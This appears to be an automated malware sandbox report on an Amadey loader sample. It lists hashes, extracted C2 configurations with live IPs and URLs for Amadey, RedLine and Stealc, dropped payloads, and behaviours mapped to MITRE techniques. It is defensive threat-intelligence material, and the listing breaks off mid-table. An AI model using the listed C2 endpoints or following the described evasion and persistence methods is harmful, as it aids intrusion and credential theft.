amadey | 2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c

Resubmissions

01-07-2024 10:57

240701-m2gvna1bmr 10

27-06-2024 14:07

240627-re4s5axbqm 10

26-06-2024 21:27

240626-1awrdsvdkd 10

Analysis

max time kernel
274s
max time network
275s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Size

1.9MB
MD5

f7b7a8eb191d45b9cf730d6fe78d36e1
SHA1

0b7a7220d686c904b0ea89b6e036fb21acf0f85b
SHA256

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c
SHA512

b282e77a5855c5b302139740dfc870eec9a358669b84a8a35ccbef6abc40c4182fb34cf24d17bd5012173e71b8d7c7ddecc834248a470e7e9cffc3cdd19a4b36
SSDEEP

49152:0YUvB6P4Zu2Zrq9Lp8lt+YPawAYsOWgu30w:KwPpN0tviwAY+g0n

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

4.184.236.127:1110

Extracted

Family

redline

Botnet

123

185.215.113.67:40960

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Extracted

Family

stealc

Botnet

jopa

http://65.21.175.0

Attributes

url_path
/108e010e8f91c38c.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detects Monster Stealer. 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\onefile_1572_133639708804574833\stub.exe	family_monster
behavioral2/memory/724-641-0x00007FF60F540000-0x00007FF61077E000-memory.dmp	family_monster
behavioral2/memory/724-653-0x00007FF60F540000-0x00007FF61077E000-memory.dmp	family_monster

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Monster
Monster is a Golang stealer that was discovered in 2024.
stealer monster
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2524-38-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe	family_redline
behavioral2/memory/4840-235-0x0000000000F60000-0x0000000000FB0000-memory.dmp	family_redline
behavioral2/memory/756-234-0x0000000000CB0000-0x0000000000D00000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2504-628-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-629-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-634-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-635-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-633-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-632-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-631-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-657-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-658-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

48 4928 powershell.exe
53 4928 powershell.exe
71 1700 powershell.exe
76 1700 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

320 powershell.exe
3776 powershell.exe
1084 powershell.exe
4920 powershell.exe
4928 powershell.exe
1700 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

384 netsh.exe
4732 netsh.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
48	4928	powershell.exe
53	4928	powershell.exe
71	1700	powershell.exe
76	1700	powershell.exe

pid	process
320	powershell.exe
3776	powershell.exe
1084	powershell.exe
4920	powershell.exe
4928	powershell.exe
1700	powershell.exe

pid	process
384	netsh.exe
4732	netsh.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplong.exeaxplong.exeaxplong.exeaxplong.exe2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NewLatest.exeHkbsse.exeldr.exeRegAsm.exe2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	NewLatest.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	Hkbsse.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	ldr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	axplong.exe

Executes dropped EXE 25 IoCs

Processes:

axplong.exegold.exeNewLatest.exeHkbsse.exeInstaller.exeFirstZ.exeldr.exeHkbsse.exealex5555555.exe123.exesvhosts.exeExplorers.exestreamer.exeTpWWMUpe0LEV.exeHkbsse.exeaxplong.exebuild.exestub.exereakuqnanrkn.exeHkbsse.exeaxplong.exeHkbsse.exeaxplong.exeaxplong.exeHkbsse.exe

pid	process
4996	axplong.exe
3896	gold.exe
3776	NewLatest.exe
2188	Hkbsse.exe
4904	Installer.exe
2760	FirstZ.exe
4976	ldr.exe
4004	Hkbsse.exe
5020	alex5555555.exe
4840	123.exe
756	svhosts.exe
4188	Explorers.exe
3580	streamer.exe
5112	TpWWMUpe0LEV.exe
3904	Hkbsse.exe
2684	axplong.exe
1572	build.exe
724	stub.exe
5064	reakuqnanrkn.exe
2488	Hkbsse.exe
4496	axplong.exe
3904	Hkbsse.exe
2996	axplong.exe
1360	axplong.exe
3872	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exeaxplong.exeaxplong.exe2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe

Loads dropped DLL 34 IoCs

Processes:

TpWWMUpe0LEV.exestub.exe

pid	process
5112	TpWWMUpe0LEV.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2504-628-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-629-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-627-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-634-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-635-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-633-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-632-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-631-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-625-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-623-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-626-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-657-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-658-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Installer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

64 bitbucket.org
115 raw.githubusercontent.com
116 raw.githubusercontent.com
125 pastebin.com
126 pastebin.com
63 bitbucket.org
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

109 ip-api.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

3476 powercfg.exe
540 powercfg.exe
3252 powercfg.exe
4300 powercfg.exe
3300 powercfg.exe
2028 powercfg.exe
5080 powercfg.exe
4876 powercfg.exe

flow	ioc
64	bitbucket.org
115	raw.githubusercontent.com
116	raw.githubusercontent.com
125	pastebin.com
126	pastebin.com
63	bitbucket.org

flow	ioc
109	ip-api.com

pid	process
3476	powercfg.exe
540	powercfg.exe
3252	powercfg.exe
4300	powercfg.exe
3300	powercfg.exe
2028	powercfg.exe
5080	powercfg.exe
4876	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exereakuqnanrkn.exeFirstZ.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

1976 cmd.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

pid process

4808 2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4996 axplong.exe
2684 axplong.exe
4496 axplong.exe
2996 axplong.exe
1360 axplong.exe

pid	process
1976	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

gold.exealex5555555.exeTpWWMUpe0LEV.exereakuqnanrkn.exestreamer.exe

description	pid	process	target process
PID 3896 set thread context of 2524	3896	gold.exe	RegAsm.exe
PID 5020 set thread context of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5112 set thread context of 3448	5112	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 5064 set thread context of 1188	5064	reakuqnanrkn.exe	conhost.exe
PID 5064 set thread context of 2504	5064	reakuqnanrkn.exe	explorer.exe
PID 3580 set thread context of 4480	3580	streamer.exe	BitLockerToGo.exe

Drops file in Windows directory 3 IoCs

Processes:

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeNewLatest.exeldr.exe

description	ioc	process
File created	C:\Windows\Tasks\axplong.job	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\Tasks\Hkbsse.job	ldr.exe

Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4344 sc.exe
2540 sc.exe
4468 sc.exe
4760 sc.exe
2216 sc.exe
684 sc.exe
3200 sc.exe
2696 sc.exe
4000 sc.exe
4808 sc.exe
2468 sc.exe
1184 sc.exe
1296 sc.exe
320 sc.exe
3968 sc.exe
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\cryptography\hazmat\bindings\_rust.pyd embeds_openssl
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4344	sc.exe
2540	sc.exe
4468	sc.exe
4760	sc.exe
2216	sc.exe
684	sc.exe
3200	sc.exe
2696	sc.exe
4000	sc.exe
4808	sc.exe
2468	sc.exe
1184	sc.exe
1296	sc.exe
320	sc.exe
3968	sc.exe

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\cryptography\hazmat\bindings\_rust.pyd	embeds_openssl

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4344 3896 WerFault.exe gold.exe
2336 5020 WerFault.exe alex5555555.exe
2784 3448 WerFault.exe aspnet_regiis.exe

pid	pid_target	process	target process
4344	3896	WerFault.exe	gold.exe
2336	5020	WerFault.exe	alex5555555.exe
2784	3448	WerFault.exe	aspnet_regiis.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aspnet_regiis.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aspnet_regiis.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_regiis.exe

Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.

Data from Local System
T1005

Processes:

WMIC.exe

pid process

5072 WMIC.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2580 tasklist.exe
2740 tasklist.exe
4760 tasklist.exe

pid	process
5072	WMIC.exe

pid	process
2580	tasklist.exe
2740	tasklist.exe
4760	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeNETSTAT.EXE

pid process

4876 ipconfig.exe
440 NETSTAT.EXE
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

384 systeminfo.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4148 taskkill.exe

pid	process
4876	ipconfig.exe
440	NETSTAT.EXE

pid	process
384	systeminfo.exe

pid	process
4148	taskkill.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.exeexplorer.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639710237343087"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

876 reg.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1136 schtasks.exe
3712 schtasks.exe
3860 schtasks.exe
5072 schtasks.exe
4884 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	powershell.exe

pid	process
876	reg.exe

pid	process
1136	schtasks.exe
3712	schtasks.exe
3860	schtasks.exe
5072	schtasks.exe
4884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exepowershell.exepowershell.exepowershell.exeExplorers.exesvhosts.exe123.exepowershell.exeaxplong.exeFirstZ.exepowershell.exepowershell.exereakuqnanrkn.exepowershell.exe

pid	process
